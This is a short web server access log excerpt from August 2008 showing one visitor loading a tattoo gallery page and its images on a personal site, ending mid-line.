87.219.229.123 - - [17/Aug/2008:06:42:44 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.219.229.123 - - [17/Aug/2008:06:42:53 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1762 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.219.229.123 - - [17/Aug/2008:06:42:53 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.219.229.123 - - [17/Aug/2008:06:42:53 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.219.229.123 - - [17/Aug/2008:06:42:53 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.219.229.123 - - [17/Aug/2008:06:42:53 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.219.229.123 - - [17/Aug/2008:06:42:53 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.219.229.123 - - [17/Aug/2008:06:42:53 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.219.229.123 - - [17/Aug/2008:06:42:53 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.